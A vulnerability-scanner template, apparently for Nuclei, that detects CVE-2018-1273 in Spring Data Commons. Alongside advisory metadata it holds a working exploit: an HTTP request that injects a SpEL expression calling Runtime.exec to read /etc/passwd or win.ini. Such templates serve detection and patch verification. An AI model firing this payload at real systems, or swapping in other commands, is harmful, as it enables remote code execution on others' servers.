id: CVE-2018-1273 info: name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. impact: | Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the vendor to fix the deserialization vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - https://pivotal.io/security/cve-2018-1273 - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E - https://www.oracle.com/security-alerts/cpujul2022.html - https://github.com/2lambda123/SBSCAN classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 epss-score: 0.97515 epss-percentile: 0.99982 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: pivotal_software product: spring_data_commons tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software http: - raw: - | POST /account HTTP/1.1 Host: {{Hostname}} Connection: close Content-Type: application/x-www-form-urlencoded name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}} payloads: command: - "cat /etc/passwd" - "type C:\\/Windows\\/win.ini" matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or # digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950